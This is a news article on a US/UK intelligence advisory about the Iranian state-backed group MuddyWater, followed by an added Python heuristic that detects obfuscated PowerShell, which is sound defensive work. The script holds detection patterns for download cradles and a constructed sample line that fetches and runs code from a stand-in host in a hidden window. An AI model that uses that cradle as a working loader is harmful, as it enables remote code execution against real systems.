Iranian government-sponsored hackers are conducting active cyber operations against global commercial and government networks, according to a warning issued earlier this week by United States and United Kingdom intelligence agencies.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) said they detected a group of Iranian government-sponsored advanced persistent threat (APT) actors – known as MuddyWater – conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across various sectors in Asia, Africa, Europe, and North America.
According to the notice, MuddyWater – also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros – is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), and has conducted broad cyber campaigns in support of MOIS objectives since about 2018.
“MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors,” the notice reads. “[They] are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware.”
The threat actors maintain persistence on these networks using tactics such as side-loading dynamic link libraries (DLLs) to trick legitimate programs into running malware, and obfuscating PowerShell scripts to hide their command and control (C2) functions. The FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using a variety of malware along with other tools as part of their malicious activity.
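The obfuscated PowerShell mentioned above is the part of this activity a defender can actually hunt for in process-creation telemetry. The following is an added example, not code from the advisory or from the article: a small heuristic scorer that reads PowerShell command lines (the CommandLine field of a Sysmon Event ID 1 or Windows Security 4688 event), decodes any -EncodedCommand payload, and scores both the outer line and the decoded script for common obfuscation and download-cradle patterns. The heuristic names, weights, the alert threshold and the three sample command lines are all constructed for illustration; none are published MuddyWater indicators.

```python
"""Heuristic scorer for obfuscated PowerShell command lines (added example, not from the advisory)."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Optional

THRESHOLD = 4  # assumed alert threshold; tune against your own baseline before alerting

# (name, pattern, weight, cap): score += weight * min(hit_count, cap).
# Weights and caps are assumptions chosen so that one strong indicator, or
# two weaker ones, crosses THRESHOLD.
HEURISTICS = [
    ("hidden_window",     re.compile(r"(?i)\s-w[a-z]*\s+hidden\b"), 2, 1),
    ("invoke_expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), 2, 1),
    ("download_cradle",   re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"), 2, 1),
    ("base64_decode",     re.compile(r"(?i)frombase64string"), 2, 1),
    ("backtick_split",    re.compile(r"[A-Za-z]`[A-Za-z]"), 2, 1),   # I`E`X style token splitting
    ("string_concat",     re.compile(r"""['"]\s*\+\s*['"]"""), 1, 3),  # 'Inv'+'oke-Ex'+'pression'
    ("char_cast",         re.compile(r"(?i)\[char\]\s*\d+"), 1, 3),
    ("format_operator",   re.compile(r"""(?i)\{\d+\}['"][^|]*-f\s"""), 2, 1),
]

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...), so match
# "-e<letters>" followed by a base64 blob rather than the full switch name.
ENCODED_RE = re.compile(r"(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    command: str
    score: int = 0
    hits: list = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_command(cmd: str, depth: int = 0) -> Finding:
    """Score one command line; decoded payloads are scored recursively (depth-limited)."""
    f = Finding(command=cmd)
    for name, rx, weight, cap in HEURISTICS:
        n = len(rx.findall(cmd))
        if n:
            f.hits.append(name)
            f.score += weight * min(n, cap)
    decoded = decode_encoded_command(cmd)
    if decoded is not None and depth < 2:
        # The outer line rarely shows intent; the decoded script usually does.
        inner = score_command(decoded, depth + 1)
        f.decoded = decoded
        f.hits.append("encoded_command")
        f.hits.extend("decoded:" + h for h in inner.hits)
        f.score += 3 + inner.score
    return f


def triage(command_lines) -> list:
    """Return the findings that cross THRESHOLD, highest score first."""
    findings = [score_command(c) for c in command_lines]
    return sorted((x for x in findings if x.suspicious), key=lambda x: -x.score)


def build_encoded_sample() -> str:
    """Constructed: an encoded download cradle launched the way an operator would."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage')"
    b64 = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -Enc {b64}"


# Constructed command lines (not real indicators): one benign admin script,
# one with backtick and string-concatenation obfuscation, one encoded cradle.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    "powershell.exe -nop -c \"I`E`X ('Get-Pr'+'oc'+'ess')\"",
    build_encoded_sample(),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_COMMAND_LINES):
        print(f"score={f.score:2d} hits={f.hits}")
        if f.decoded:
            print(f"   decoded: {f.decoded}")
```

Two design points matter in practice. First, scoring the decoded payload rather than only flagging the presence of -EncodedCommand is what separates the obfuscated C2 loader from the many legitimate management tools that also pass encoded commands; the benign sample scores zero, the two obfuscated ones land at 4 and 9. Second, the prefix-tolerant switch matching (-e, -enc, -w, -win) closes the trivial evasion of abbreviating parameter names, which pure string matches on "-EncodedCommand" miss.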
The notice provides organizations with observed tactics, techniques, and procedures; malware examples; and indicators of compromise associated with MuddyWater activity to help identify malicious activity against sensitive networks.